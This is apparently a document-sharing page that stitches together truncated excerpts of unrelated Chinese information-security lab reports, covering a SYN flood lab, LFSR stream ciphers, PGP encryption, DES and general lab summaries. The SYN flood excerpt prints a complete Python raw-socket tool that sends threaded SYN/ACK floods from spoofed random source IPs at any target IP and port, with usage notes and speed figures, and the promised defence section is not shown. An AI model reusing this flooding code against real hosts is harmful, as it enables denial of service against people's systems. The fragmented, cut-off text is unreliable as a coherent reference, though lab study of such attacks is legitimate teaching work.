信息安全实验二

合集下载

信息安全试验

信息安全试验

目录1.实验一网络通信安全1.1实验目的-------------------------------------------31.2实验内容-------------------------------------------31.3相关知识-------------------------------------------31.4实验设计-------------------------------------------51.5实验成果-------------------------------------------71.6实验小结-------------------------------------------9 2.实验二网络攻防2.1实验目的------------------------------------------102.2实验内容------------------------------------------102.3实验原理------------------------------------------102.4实验步骤------------------------------------------102.5实验小结------------------------------------------14 3.实验三Web服务器配置3.1实验目的------------------------------------------153.2实验要求------------------------------------------153.3实验内容------------------------------------------153.4实验小结------------------------------------------29 4.实验四信息系统安全4.1实验目的------------------------------------------304.2实验内容------------------------------------------304.3实验设计------------------------------------------304.4实验成果------------------------------------------314.5实验小结------------------------------------------34实验一网络通信安全1.1实验目的通过本章的学习,使学生掌握密码学在通信安全中的具体应用。

国家开放大学-—网络安全评价—实训2-拒绝服务攻击-TCP SYN Flood攻击与防御

国家开放大学-—网络安全评价—实训2-拒绝服务攻击-TCP SYN Flood攻击与防御

信息安全与管理专业实训报告学生姓名:一、实训名称:拒绝服务攻击-TCP SYN Flood攻击与防御。

二、实训内容1、kali的安装部署2、SYN Flood攻击演示3、观察受攻击目标的系统状态4、防御措施三、实验步骤1、python攻击代码环境:ubuntu/kali +python 2.7.11使用方法如下:mode有三种模式syn攻击、ack攻击、混合攻击,虽说是支持多线程但是多个线程反而不如单线程快,估计是我的多线程弄得有些问题,麻烦这方面比较懂的朋友帮我指点一下。

我电脑是i7-6700单线程也只能这点速度。

cpu1已经使用89%了看一下抓包情况吧,因为只是测试用我也没带tcp的options字段,报文长度也不够64字节,不过也能传到目的地址。

下面是代码:#!/usr/bin/python#-*-coding:utf-8-*-import socketimport structimport randomimport threadingclass myThread (threading.Thread):def __init__(self,dstip,dstport,mode):threading.Thread.__init__(self)self.dstip = dstipself.dstport =dstportself.mode =modedef run(self):attack(self.dstip,self.dstport,self.mode)def checksum(data):s = 0n = len(data) % 2for i in range(0, len(data)-n, 2):s+= ord(data[i]) + (ord(data[i+1]) << 8) if n:s+= ord(data[i+1])while (s >> 16):s = (s & 0xFFFF) + (s >> 16)s = ~s & 0xffffreturn sdef IP(source,destination,udplen):version = 4ihl = 5tos = 0tl = 20+udplenip_id = random.randint(1,65535)flags = 0offset = 0ttl = 128protocol =6check =0source = socket.inet_aton(source)destination = socket.inet_aton(destination)ver_ihl = (version << 4)+ihlflags_offset = (flags << 13)+offsetip_header = struct.pack("!BBHHHBBH4s4s",ver_ihl,tos,tl,ip_id,flags_offset,ttl,protocol,check,source,destination)check=checksum(ip_header)ip_header = struct.pack("!BBHHHBBH4s4s",ver_ihl,tos,tl,ip_id,flags_offset,ttl,protocol,socket.htons(check),source,destination)return ip_headerdef TCP(srcip,dstip,protocol,dp,fg):source = socket.inet_aton(srcip)destination = socket.inet_aton(dstip)srcport=random.randint(1,65535)dstport=dpsyn_num=random.randint(1,4000000000)if fg == 2:ack_num=0else:ack_num=random.randint(1,4000000000) hlen=5zero=0flag=fgwindow=8192check=0point=0tcplen=hlenh_f=(hlen << 12)+flagTCP_head=struct.pack("!4s4sHHHHIIHHHH",source,destination,protocol,tcplen,srcport,dstport,s yn_num,ack_num,h_f,window,check,point)check=checksum(TCP_head)TCP_head=struct.pack("!HHIIHHHH",srcport,dstport,syn_num,ack_num,h_f,window,check,point )return TCP_headdef makepacket(dstip,dstport,fg):srcip=str(random.choice(ip_first))+'.'+str(random.randint(1,255))+'.'+str(random.randint(1,255))+'. '+str(random.randint(1,255))protocol=6ippacket=IP(srcip,dstip,5)+TCP(srcip,dstip,protocol,dstport,fg)return ippacketdef attack(dstip,dstport,mode):if mode == 'syn':fg=2while 1:data=makepacket(dstip,dstport,fg)s.sendto(data,(dstip,dstport))elif mode == 'ack':fg=18while 1:data=makepacket(dstip,dstport,fg)s.sendto(data,(dstip,dstport))elif mode == 'syn&ack':while 1:data=makepacket(dstip,dstport,2)s.sendto(data,(dstip,dstport))data=makepacket(dstip,dstport,18)s.sendto(data,(dstip,dstport))else:print 'DON\'T xia say!'dstip=raw_input('attack IP:')dstport=int(input('attack PORT:'))mode=raw_input('mode:(syn or ack or syn&ack)') threads=int(input("线程数threads:"))ip_first=[]for i in range(1,10):ip_first.append(i)for i in range(11,172):ip_first.append(i)for i in range(173,192):ip_first.append(i)for i in range(193,224):ip_first.append(i)s = socket.socket(socket.AF_INET,socket.SOCK_RAW,6) s.setsockopt(socket.IPPROTO_IP,socket.IP_HDRINCL,1)threads_name=[]for i in range(threads):threads_name.append('teread'+str(i))for i in range(threads):threads_name[i]=myThread(dstip,dstport,mode)for i in range(threads):threads_name[i].start()2、C语言攻击代码环境:ubuntu/kali gcc version 6.1.1 20160802 (Debian 6.1.1-11)使用方法:支持两个参数目的ip和目的端口性能:限制发包速度的是带宽(我这是100M的网,除去报文的前导码和帧间隔极限速度差不多就是9m左右了),cpu利用才27%,我在1000Mbps的网速下测试,单线程的话速度能到40m左右,cpu占用率大约85%左右。

信息安全实验报告

信息安全实验报告

信息安全实验报告
一、实验目的
本次实验是为了研究信息安全的基本概念,建立一个简单的安全模型,探讨信息安全的模型,并对其进行实验测试,了解信息安全的相关技术,
以及如何保护敏感信息。

二、实验内容
1.定义信息安全
信息安全是指保护敏感信息不被未经授权的人访问、使用或篡改的过程。

2.研究信息安全模型
信息安全模型是一个有机的概念,它包括防御、检测、响应、应急和
恢复5个基本组成部分,旨在保护敏感信息免受未经授权的访问、使用和
篡改。

3.研究信息系统安全技术
为了增强信息安全,引入了一系列安全技术来防止未经授权的访问、
使用或篡改敏感信息,这些技术包括访问控制、身份验证、数据加密和远
程登录安全。

4.建立模型实验
为了检验信息安全模型,本次实验采用Kali Linux作为实验环境,Kali Linux设有访问控制、身份验证、数据加密和远程登录安全等安全
技术,以阻止非法的访问和操纵。

三、实验结果
1.安全技术实施完毕
在实验中,实施了访问控制、身份验证、数据加密和远程登录安全等安全技术,保证了正常的服务器运行。

2.平台安全性测试
采用Metasploit框架进行安全测试。

K_实验二 LFSR及序列密码

K_实验二   LFSR及序列密码

实验二 LFSR 及序列密码实验名称:LFSR 及序列密码实验类型: 验证性实验学 时:4适用对象: 信息安全专业、计算机网络一、实验目的通过软件模拟线性反馈移位寄存器,掌握反馈移位寄存器的工作原理,在此基础上实现非线性序列的输出,掌握序列密码基本算法和工作原理。

二、实验要求(1)掌握流密码原理;(2)理解m序列的产生;(3)能编程模拟线性反馈移位寄存器生成m序列。

三、实验原理一个简单的流加密法需要一个“随机”的二制位流作为密钥。

通过将明文与这个随机的密钥流进行XOR 逻辑运算,就可以生成密文。

将密文与相同的随机密钥进行XOR 逻辑运算即可还原明文。

该过程如图 3-1。

图3-1 流加密法 假设密钥流(二进制位流)存于字节序列k[0],…,k[L-1],共8*L bit 位,则采用C 语言循环加密的算法代码如下:void StreamEncrypt(char m[],int n,char key[],int L){//n 为需要加密或解密数据的字节数,L 为密钥长度(字节)int k=0; for(int i=0; i<n; i++){m[i]^=key[k++];if(k==L) k=0; // k%=L; (i.e. k=k%L;)}}明文要实现XOR逻辑运算很简单,正如上面所给的C程序。

当作用于位一级上时,这是一个快速而有效的加密法。

唯一的问题是必须解决如何生成随机密钥流。

这之所以是一个问题,是因为密钥流必须是随机出现的,并且合法用户可很容易再生该密钥流。

如果密钥流是重复的位序列,容易被记忆,但不很安全,如上面所给出的程序。

这就要求我们开发一个随机位密钥流所成器,它是基于一个短的种子密钥来产生密钥流的。

生成器用来产生密钥流,而用户只需记住如何启动生成器即可。

有多种产生密钥流生成器的方法。

最普遍的是使用一种称为线性反馈移位寄存器的硬件设备。

下面的图3-2中,在反馈系数决定的情况下,对于任何的初始状态,都可获得一个位流的输出。

信息安全实验报告

信息安全实验报告

信息安全实验报告信息安全实验报告一、引言信息安全是当今社会中一个重要的话题。

随着互联网的普及和信息技术的发展,人们对于信息的依赖程度越来越高,同时也面临着更多的信息安全威胁。

为了更好地了解和应对这些威胁,我们进行了一系列的信息安全实验。

本报告将对这些实验进行总结和分析。

二、实验一:密码学与加密算法在这个实验中,我们学习了密码学的基本知识,并实践了几种常见的加密算法。

通过对这些算法的理解和应用,我们深入了解了信息加密的原理和方法。

实验结果表明,合理选择和使用加密算法可以有效保护信息的安全性。

三、实验二:网络安全漏洞扫描网络安全漏洞是信息安全的一个重要方面。

在这个实验中,我们使用了一款流行的漏洞扫描工具,对一个虚拟网络进行了扫描。

实验结果显示,该网络存在多个漏洞,这些漏洞可能导致信息泄露、系统崩溃等安全问题。

通过这个实验,我们认识到了网络安全漏洞的严重性,并了解了如何进行漏洞扫描和修复。

四、实验三:社会工程学攻击模拟社会工程学攻击是信息安全领域中的一种常见攻击手段。

在这个实验中,我们模拟了一些常见的社会工程学攻击场景,如钓鱼邮件、电话诈骗等。

通过这个实验,我们认识到了社会工程学攻击的隐蔽性和危害性。

同时,我们也学习了一些防范社会工程学攻击的方法,如提高警惕、加强安全意识等。

五、实验四:网络入侵检测网络入侵是信息安全领域中的一个重要问题。

在这个实验中,我们使用了一款网络入侵检测系统,对一个虚拟网络进行了入侵检测。

实验结果显示,该网络存在多个入侵行为,如端口扫描、暴力破解等。

通过这个实验,我们认识到了网络入侵的危害性和复杂性,并学习了一些网络入侵检测的方法和技巧。

六、实验五:应急响应与恢复在信息安全领域,及时的应急响应和恢复是非常重要的。

在这个实验中,我们模拟了一次网络攻击事件,并进行了应急响应和恢复工作。

通过这个实验,我们了解了应急响应的流程和方法,并学习了一些数据恢复的技巧。

实验结果表明,及时的应急响应和恢复可以最大程度地减少信息安全事件的损失。

国家开放大学电大《信息安全》实验报告

国家开放大学电大《信息安全》实验报告

国家开放大学电大《信息安全》实验报告
本次实验的目的是测试学生们对信息安全的理解程度以及运用
能力,以确保他们的信息技能能够应用到实际中。

实验一:密码学
在密码学实验中,学生们研究了加密和解密的基本概念。

通过
实践,他们掌握了使用不同密码算法的技能如DES、RSA和MD5。

他们还学会了如何建立一个安全的通信管道,并能够防止非法用户
访问敏感信息。

实验二:网络安全
网络安全实验中,学生们研究了识别和预防网络攻击的技能。

他们学会了检测网络漏洞和如何处理欺诈行为。

此外,他们还学会
了在网络上安全地存储文件和保护隐私信息。

实验三:风险评估
在风险评估实验中,学生们研究了如何评估信息安全风险并采取适当的措施来降低这些风险。

他们了解了安全管理计划的概念以及如何制定有效的安全策略。

通过这几个实验的学习,学生们掌握了信息安全的基本概念和技能,能够应用这些技能来保护信息的安全。

这些实验也为他们未来的职业发展奠定了基础,以确保他们有能力在信息安全领域有所作为。

信息安全实训课实验报告

信息安全实训课实验报告

一、实验背景随着信息技术的飞速发展,信息安全已成为当今社会关注的焦点。

为了提高我国信息安全水平,培养具备信息安全专业技能的人才,我国高校纷纷开设信息安全实训课程。

本实验报告旨在记录我在信息安全实训课程中的实验过程、实验结果以及实验心得。

二、实验目的1. 了解信息安全的基本概念和原理;2. 掌握信息安全实训课程中常用工具的使用方法;3. 提高信息安全防护意识和实际操作能力;4. 为今后从事信息安全工作打下坚实基础。

三、实验内容1. 实验一:操作系统安全配置(1)实验目的:掌握Windows操作系统的安全配置方法,提高系统安全性。

(2)实验步骤:1)检查操作系统版本,确保系统已安装最新补丁;2)关闭不必要的服务,减少系统攻击面;3)设置强密码策略,提高账户安全性;4)启用防火墙,防止恶意攻击;5)开启系统日志,便于安全事件追踪。

(3)实验结果:成功完成操作系统安全配置,提高了系统安全性。

2. 实验二:网络扫描与漏洞检测(1)实验目的:掌握网络扫描与漏洞检测工具的使用方法,发现潜在安全风险。

(2)实验步骤:1)使用Nmap进行网络扫描,获取目标主机信息;2)使用Nessus进行漏洞检测,发现目标主机存在的安全漏洞;3)针对发现的安全漏洞,提出相应的修复建议。

(3)实验结果:成功发现目标主机存在的安全漏洞,为后续修复工作提供依据。

3. 实验三:入侵检测与防范(1)实验目的:掌握入侵检测与防范工具的使用方法,提高网络安全防护能力。

(2)实验步骤:1)使用Snort进行入侵检测,监控网络流量;2)根据检测到的入侵行为,制定相应的防范措施;3)使用iptables进行网络安全策略配置,限制非法访问。

(3)实验结果:成功识别入侵行为,并采取相应措施,保障网络安全。

4. 实验四:加密与数字签名(1)实验目的:掌握加密与数字签名技术,提高信息安全防护水平。

(2)实验步骤:1)使用OpenSSL进行对称加密,保护数据传输安全;2)使用OpenSSL进行非对称加密,实现数字签名;3)验证数字签名,确保数据来源可靠性。

实验二对称密码基本加密课案

实验二对称密码基本加密课案

西北师范大学计算机科学与工程学院学生实验报告学号:201371060113 2016 年 3 月13 日(2)将下面的运算迭代16轮(i=1,2,…,16):Li=Ri-1 ,Ri-1=Li-1f(Ri-1,ki);这里ki称为轮R1`=L0`f(R0`,k1`)=R16f(L16,k1`)=[L16f(R15,k16)]f(R15,k16)=L15,即(L1`,R1`)=(R15,L15);同样解密过程可表示为:,其中。

l 6位子分组的相异或;16位整数的模216加,即;16位整数的模216+1乘,即。

个子块,每块16位,分别记为。

64位的密文也分为4个子块,每块16位,分别记为。

128位的密钥经过子密钥生成算法产生出52个16位的子密钥,每一轮加密迭代使用6个子密钥,输出变换使用4个子密钥。

记为第r轮迭代使用的第i个子密钥,。

记为输出变换使用的第i个子密钥,。

(1)。

(2)。

(3)。

(4)。

(7)将第(5)步的结果乘以。

(9)将第(8)步的结果乘以。

分组也如此:k=k0,k1,…,k15;内部数据结构的表示为一个44矩阵:输入密钥B=L(A)=A(A<<<2)(A<<<10)(A<<<18)(A<<<24)L’为L的修改,;M i i i(1)加密过程在“加密过程”框中,选择明文的输入形式后,输入明文;DES要求明文分组长度为64位,输入要求参照密钥输入步骤;点击“比特流”按钮生成输入的明文分组的比特流;点击“初始置换IP”对明文比特流进行初始置换,并等分为32位左右两部分L0和R0;点击“扩展置换E”按钮对32位R0进行扩展置换,将其扩展到48位;点击“异或计算”按钮,将得到的扩展结果与轮密钥K1进行异或,得到48位异或结果;分别点击“S1”、“S2”、…、“S8”按钮,将得到的48位异或结果通过S代换产生32位输出;。

简单安全的小实验

简单安全的小实验

简单安全的小实验近年来,随着科技的迅猛发展,人们对网络安全的重视程度也越来越高。

为了提高公众对网络安全的认识和意识,进行一些简单安全的小实验是非常有必要的。

本文将介绍一些简单且安全的小实验,帮助读者更好地了解网络安全知识。

一、密码破解实验密码是我们日常生活中常用的一种保护个人信息安全的方式。

但是,有些人可能会使用弱密码,容易被他人破解。

为了提醒人们设置更加安全的密码,我们可以进行一个密码破解实验。

实验步骤:1. 在一个模拟网站上注册一个账号,并设置一个容易破解的密码,比如“123456”或“abcdef”;2. 在另一个设备上,使用密码破解软件进行暴力破解,尝试破解该账号的密码;3. 观察破解的时间和结果;4. 再次在模拟网站上注册一个账号,但这次设置一个复杂的密码,包含大小写字母、数字和特殊字符;5. 再次使用密码破解软件进行暴力破解,尝试破解该账号的密码;6. 观察破解的时间和结果。

通过这个实验,可以清楚地看到简单密码和复杂密码的安全性差异,提醒人们设置更加安全的密码来保护个人信息。

二、网络钓鱼实验网络钓鱼是一种常见的网络诈骗手段,通过仿冒合法机构的网站或发送虚假电子邮件来获取用户的个人信息。

为了让人们更加警惕网络钓鱼行为,可以进行一个网络钓鱼实验。

实验步骤:1. 在一个模拟的电子邮件中,发送一封虚假的钓鱼邮件,内容为恶意链接,诱导用户点击;2. 观察用户是否会点击链接,并记录点击的数量;3. 在另一个电子邮件中,发送一封真实的邮件,提醒用户注意网络钓鱼的风险,并给出判断真假邮件的几个要点;4. 再次发送一封虚假的钓鱼邮件,观察用户是否能够识别出来,并记录点击的数量。

通过这个实验,可以帮助人们更好地认识网络钓鱼的危害,提高警惕性,避免成为网络钓鱼的受害者。

三、网络隐私保护实验随着互联网的普及,个人隐私的泄露成为一个严重的问题。

为了帮助人们更好地保护个人隐私,可以进行一个网络隐私保护实验。

实验步骤:1. 在一个模拟的社交媒体平台上注册一个账号,填写真实的个人信息;2. 发布一些个人隐私相关的信息,比如家庭地址、手机号码等;3. 观察是否会有陌生人通过这些信息进行骚扰或侵犯个人隐私;4. 删除这些个人隐私相关的信息,并修改账号设置,提高隐私保护级别;5. 再次观察是否会有陌生人通过这些信息进行骚扰或侵犯个人隐私。

北邮课程教学大纲

北邮课程教学大纲

北京邮电大学课程教学大纲课程名称 _______信息安全实验___________开课单位 _______信息工程学院___________2004年 12月 1日一、课程编号·二、课程名称(学分/学时)中文:信息安全实验(2学分/34学时)英文:Information Security Experiment三、先修课程计算机网络现代密码学,信息安全概论四、课程教学目的通过本课程的学习,使学生理论联系实际,培养他们在信息安全技术方面的动手能力和实际技能,加强对信息安全基本理论的理解。

五、课程教学基本要求掌握对称加密算法、非对称加密算法、HASH算法、数字签名算法的编码实现;掌握数字水印和信息隐藏技术的编码实现;掌握交换机、路由器的使用,局域网和广域网的配置;掌握网络探测和扫描、漏洞扫描、网络攻击与防范技术;掌握Windows和Linux操作系统安全技术;掌握Web、FTP等应用服务器安全配置技术;掌握VPN、防火墙、IDS等网络安全技术;掌握基于Windows操作系统的整体安全解决方案集成技术;掌握基于Linux操作系统的整体安全解决方案集成技术;掌握基于Cisco的硬件安全解决方案集成技术。

六、教学基本内容及学时分配(含实验)实验一:密码算法的实现实验内容:练习对称加密算法、非对称加密算法、HASH算法、数字签名算法、数字水印和信息隐藏技术的实现。

学时分配:4学时实验二:网络基础与应用实验内容:交换机的配置初步;路由器的安装和配置;路由表的配置;VLAN的划分和配置;RIP配置;OSPF配置;路由器安全和AAA授权。

学时分配:6学时实验三:网络探测、漏洞扫描、网络攻击与防范实验内容:使用Sniffer监听;网络检测和扫描工具的使用;漏洞扫描工具的使用;帐号口令破解;木马攻击与防范;DDOS攻击与防范;缓冲区溢出攻击与防范;欺骗攻击与防范;计算机病毒的防范;其他攻击技术。

学时分配:6学时实验四:系统安全技术实验内容:Windows和Linux系统安全:1) 帐号和口令的安全性;2) 文件系统安全;3)安全模板和安全策略;4)EFS;5)MBSA;6)审核和日志;7)Web服务器安全;8)FTP服务器安全;9)Email服务器安全;10)CA系统的应用。

实验2 网络扫描及安全评估实验

实验2 网络扫描及安全评估实验

HUNAN UNIVERSITY《信息安全原理》实验报告实验二网络扫描及安全评估实验一、实验目的掌握网络端口扫描器的使用方法,熟悉常见端口和其对应的服务程序,掌握发现系统漏洞的方法。

●掌握综合扫描及安全评估工具的使用方法,了解进行简单系统漏洞入侵的方法,了解常见的网络和系统漏洞以及其安全防护方法。

二、实验原理●端口扫描原理●端口扫描向目标主机的TCP/IP服务端口发送探测数据包,并记录目标主机的响应。

通过分析响应来判断服务端口是打开还是关闭,就可以得知端口提供的服务或信息。

●端口扫描主要有经典的扫描器(全连接)、SYN(半连接)扫描器、秘密扫描等。

●全连接扫描:扫描主机通过TCP/IP协议的三次握手与目标主机的指定端口建立一次完整的连接。

建立连接成功则响应扫描主机的SYN/ACK连接请求,这一响应表明目标端口处于监听(打开)的状态。

如果目标端口处于关闭状态,则目标主机会向扫描主机发送RST的响应。

●半连接(SYN)扫描:若端口扫描没有完成一个完整的TCP连接,在扫描主机和目标主机的一指定端口建立连接时候只完成了前两次握手,在第三步时,扫描主机中断了本次连接,使连接没有完全建立起来,这样的端口扫描称为半连接扫描,也称为间接扫描。

●TCP FIN(秘密)扫描:扫描方法的思想是关闭的端口会用适当的RST来回复FIN数据包。

另一方面,打开的端口会忽略对FIN数据包的回复。

●综合扫描和安全评估技术工作原理●获得主机系统在网络服务、版本信息、Web应用等相关信息,然后采用模拟攻击的方法,对目标主机系统进行攻击性的安全漏洞扫描,如果模拟攻击成功,则视为漏洞存在。

最后根据检测结果向系统管理员提供周密可靠的安全性分析报告。

三、实验环境●实验室所有机器安装了Windows操作系统,并组成了一个局域网,并且都安装了SuperScan端口扫描工具和流光Fluxay5综合扫描工具。

●每两个学生为一组:互相进行端口扫描和综合扫描实验。

实验二-使用PGP进行加解密实验报告

实验二-使用PGP进行加解密实验报告

“使用PGP进行加解密”实验报告班级:姓名:实验日期:实验时间:至实验地点:院楼435华南农业大学信息学院一.实验目的通过使用PGP软件对文件进行加密和解密,加深对加密和解密技术的认识。

二.实验内容1合作双方分别在自己机器上的PGP软件中生成密钥对。

2双方分别导出自己的公钥并传给对方(可通过磁盘拷贝,网络拷贝或电子邮件传输)。

3双方分别将对方传来的公钥导入到自己的PGP软件中,并对此公钥进行签名确认信任此公钥。

4 双方分别加密一个文件。

用记事本程序打开加密后的文件,观察文件的内容。

5双方分别将加密后的文件传给对方。

6双方分别用PGP软件解密收到的加密文件。

三.实验设备(2人一组)PC机两台,安装有以下软件:1 Windows 2000 Professional操作系统2 PGP软件四. 实验记录记录实验的每一步操作过程,配置参数,实验结果,操作过程中出现的问题及及解决方法。

(一)生成新的密钥对(1)点击“开始”-> “程序”->“PGP”->“PGPKeys”(2)在弹出的窗口的菜单栏中,选择“keys”->“New Key…”(3)在弹出的PGP Key Generation Wizard(PGP密钥生成向导)窗口中,点“下一步”按钮,进入Name and Email Assignment(用户名和电子邮件分配)界面,在Full name处输入用户名,Email address处输入用户所对应的电子邮件地址,完成后点“下一步”按钮。

(4)在Passphrase Assignment(密码设定)界面,在Passphrase处输入你需要的密码,Confirmation(确认)处再输入一次,密码长度必须大于8位。

完成后点“下一步”按钮。

进入Key Generation Progress(密钥生成进程),等待主密钥(Key)和次密钥(Subkey)生成完毕(出现Done)。

点击“下一步”按钮,进入Completing the PGP Key Generation Wizard(完成该PGP 密钥生成向导)再点“完成”按钮,你的密钥对就创建好了。

计算机信息安全 实验二 L0phtcrack

计算机信息安全 实验二 L0phtcrack

集美大学计算机工程学院实验报告课程名称:计算机信息安全技术班级:计算12实验成绩:指导教师:付永钢姓名:学号:20上机实践日期:2014实验项目名称:使用L0phtcrack破解Windows 2000密码实验项目编号:实验二组号:上机实践时间:4 学时一实验目的通过密码破解工具的使用,了解帐号的安全性,掌握安全口令的设置原则,以保护帐号口令的安全。

二实验原理口令密码应该说是用户最重要的一道防护门,如果密码被破解了,那么用户的信息将很容易被窃取。

随着网络黑客攻击技术的增强和提高,许多口令都可能被攻击和破译,这就要求用户提高对口令安全的认识。

一般入侵者常常通过下面几种方法获取用户的密码口令,包括口令扫描、Sniffer密码嗅探、暴力破解、社会工程学(即通过欺诈手段获取)以及木马程序或键盘记录程序等手段。

有关系统用户帐户密码口令的破解主要是基于密码匹配的破解方法,最基本的方法有两个,即穷举法和字典法。

穷举法是效率最低的办法,将字符或数字按照穷举的规则生成口令字符串,进行遍历尝试。

在口令稍微复杂的情况下,穷举法的破解速度很低。

字典法相对来说较高,它用口令字典中事先定义的常用字符去尝试匹配口令。

口令字典是一个很大的文本文件,可以通过自己编辑或者由字典工具生成,里面包含了单词或者数字的组合。

如果你的密码就是一个单词或者是简单的数字组合那么破解者就可以很轻易的破解密码。

常用的密码破解工具和审核工具很多,例如Windows平台口令的L0phtCrack、WMICracker、SAMInside等。

通过这些工具的使用,可以了解口令的安全性。

三实验环境一台装有Windows 2000/XP系统的计算机,安装L0phtCrack5.04、SAMInside的密码破解工具。

四实验内容和任务在本ftp中提供L0phtCrack6和L0phtCrack5(破解版) ,SAMInside。

注意:L0phtCrack6未破解,只可以使用15天。

RSA实验二

RSA实验二

实验原理一.非对称密钥加密概述前面讲述了对称密钥加密体制。

使用对称密钥加密体制进行保密通信时,任意不同的两个用户之间都应该使用互不相同的密钥。

这样,如果一个网络中有n个用户,他们之间彼此都可能进行秘密通信,这时网络中将需要n(n-1)/2个密钥(其中,每个用户都需要保存n-1个密钥),这样巨大的密钥量给密钥分配和管理带来了极大的困难。

另外,随着计算机网络,特别是因特网的发展,网络上互不相识的用户可能需要进行保密的会话(例如,如果用户在进行电子商务活动时,需要保密的连接,这时的客户对象可能根本不是固定的对象)。

最后,对称密钥加密机制难以解决签名验证问题。

非对称密钥加密也称为公开密钥加密,或者叫做公钥加密算法。

使用公开密钥密码的每一个用户都分别拥有两个密钥:加密密钥和解密密钥,它们两者并不相同,并且由加密密钥得到解密密钥在计算机上是不可行的。

每一个用户的加密密钥都是公开的。

因此,加密密钥也称为公开密钥。

所有用户的公开密钥都将记录在作用类似于电话号码薄的密钥本上,而它可以被所有用户访问,这样每一个用户都可以得到其他所有用户的公开密钥。

同时,每一个用户的解密密钥将由用户保存并严格保密。

因此,解密密钥也称为私有密钥。

非对称密码算法解决了对称密码体制中密钥管理的难题,并提供了对信息发送人的身份进行验证的手段,是现代密码学最重要的发明。

公钥加密算法一般是将对密钥的求解转化为对数学上的困难问题的求解,例如RSA算法的安全性是建立在“大数分解和素性检测”这个数论难题的基础上,已知两个大素数a、b,求出a*b是容易计算的,而已知a*b,想知道其是哪两个大素数的乘积目前还没有好的计算方法,另外也有一些非对称加密算法(如ELGamal算法)的安全性是基于求“离散对数”这个数学难题上的。

在公钥密码系统中每个实体都有自己的公钥和相应的私钥。

公钥密码系统的加密变换和解密变换分别用E和D表示。

任何实体B要向实体A发送信息m的步骤如下:实体B首先获得实体A的真实公钥的拷贝(eA),实体B使用eA计算密文c=E(m)并发送给实体A,实体A使用自己的私钥dA,计算m=D(c)解密密文,恢复出明文m。

网络安全技术实验报告实验2Web服务器及安全设置

网络安全技术实验报告实验2Web服务器及安全设置

XX大学本科实验报告课程名称:网络安全技术1421351 学号:XXX姓名:网络工程专业:班级:网络B14-1 指导教师:课内实验目录及成绩信息技术学院2016年9 月29 日XX大学实验报告课程名称:计算机信息安全实验类型:演示、验证实验项目名称:实验一构建虚拟局域网实验地点:信息楼320 实验日期:2016 年9月22 日无线网络安全设置操作很常用,对于掌握相关的知识的理解和应用也很有帮助。

1. 实验目的在上述无线网络安全基本技术及应用的基础上,还要掌握小型无线网络的构建及其安全设置方法,进一步了解无线网络的安全机制,理解以WEP算法为基础的身份验证服务和加密服务。

2. 实验要求1)实验设备本实验需要使用至少两台安装有无线网卡和Windows操作系统的连网计算机。

2)注意事项(1) 预习准备。

由于本实验内容是对Windows 操作系统进行无线网络安全配置,需要提前熟悉Windows 操作系统的相关操作。

(2) 注意理解实验原理和各步骤的含义对于操作步骤要着重理解其原理,对于无线网络安全机制要充分理解其作用和含义。

(3) 实验学时:2学时(90-100分钟)3.实验内容及步骤1. SSID和WEP设置(1) 在安装了无线网卡的计算机上,从“控制面板”中打开“网络连接”窗口,如17所示。

(2) 右击“无线网络连接”图标,在弹出的快捷菜单中选择“属性”选项,打开“无线网络属性”对话框,选中“无线网络配置”选项卡中的“用Windows配置我的无线网络设置”复选框,如18所示。

17 “网络连接”窗口18 “无线网络连接属性”对话框(3) 单击“首选网络“选项组中的“添加”按钮,显示“无线网络属性”对话框,如19所示。

该对话框用来设置网络。

1) 在“网络名(SSID)”文本框中输入一个名称,如hotspot,无线网络中的每台计算机都需要使用该网络名进行连接。

2) 在“网络验证”下拉列表中可以选择网络验证的方式,建议选择“开放式”。

网络与信息安全实验教程课程设计

网络与信息安全实验教程课程设计

网络与信息安全实验教程课程设计1. 简介网络与信息安全是当前互联网时代的重要课题,也是计算机科学与技术领域的重要研究方向。

在学习网络与信息安全的过程中,实验教学是必不可少的环节。

本文将介绍一个网络与信息安全实验教程的课程设计,包括实验内容、实验步骤、实验环境和实验要求等。

2. 实验内容该实验教程包括以下几个实验:实验一:网络环境搭建该实验是网络与信息安全实验教程的入门实验,通过搭建一个实验环境,学生将学会基本的网络配置和搭建方法,以及网络拓扑结构的分析和设计方法。

该实验的主要内容包括:•网络拓扑结构设计•网络设备选择与配置•网络协议分析与实现实验二:网络攻击和防御该实验是一个重要的实验,学生将学习网络攻击的方法和手段,以及相应的防御措施。

该实验的主要内容包括:•网络攻击类型与分类•网络安全要求与策略•网络防御技术与工具实验三:Web安全和数据传输加密该实验是一个与互联网密切相关的实验,学生将学会如何保护Web服务的安全性和数据传输的机密性。

该实验的主要内容包括:•Web攻击类型与示例•Web服务安全机制与防范方法•数据传输加密与解密技术实验四:移动安全和恶意代码检测该实验是一个面向当前智能手机和移动设备的实验,学生将学会如何保护移动设备的安全性和检测恶意代码。

该实验的主要内容包括:•移动设备平台安全特性分析•移动设备恶意代码种类与检测技术•移动设备防范与安全管理3. 实验步骤每个实验包含以下步骤:•准备实验环境,包括硬件和软件环境。

•阐述实验要求和目的,说明实验中要采取的方法和策略。

•展示实验设计和方案,包括网络环境的拓扑结构和设备配置。

•进行实验操作和测试,记录实验过程和结果。

•分析实验结果,总结实验经验和教训。

4. 实验环境实验环境要求如下:•操作系统:Windows或Linux。

•实验平台:VirtualBox或VMware。

•虚拟机镜像:包括Ubuntu、Kali、Windows Server等操作系统镜像。

信息安全实验

信息安全实验

信息安全实验报告实验一、对称加密算法实验题目:对称加密算法实验学号:201100300144日期:2013.11.2班级:软件3班姓名:刘桂良Email:61536799@实验目的:(1)了解对称算法的基本工作流程。

(2)掌握对称算法的使用方法硬件环境:处理器:Intel(R)Core(TM)i3-2310M CPU@2.10GHZ 2.10GHZ内存:4.00G软件环境:Windows7Python2.7实验步骤:1.加密算法原理对称加密算法是应用较早的加密算法,技术成熟。

在对称加密算法中,数据发信方将明文(原始数据)和加密密钥一起经过特殊加密算法处理后,使其变成复杂的加密密文发送出去。

收信方收到密文后,若想解读原文,则需要使用加密用过的密钥及相同算法的逆算法对密文进行解密,才能使其恢复成可读明文。

在对称加密算法中,使用的密钥只有一个,发收信双方都使用这个密钥对数据进行加密和解密,这就要求解密方事先必须知道加密密钥。

对称加密算法的特点是算法公开、计算量小、加密速度快、加密效率高。

(1).DES加密算法:DES使用一个56位的密钥以及附加的8位奇偶校验位,产生最大64位的分组大小。

这是一个迭代的分组密码,使用称为Feistel的技术,其中将加密的文本块分成两半。

使用子密钥对其中一半应用循环功能,然后将输出与另一半进行“异或”运算;接着交换这两半,这一过程会继续下去,但最后一个循环不交换。

DES使用16个循环,使用异或,置换,代换,移位操作四种基本运算。

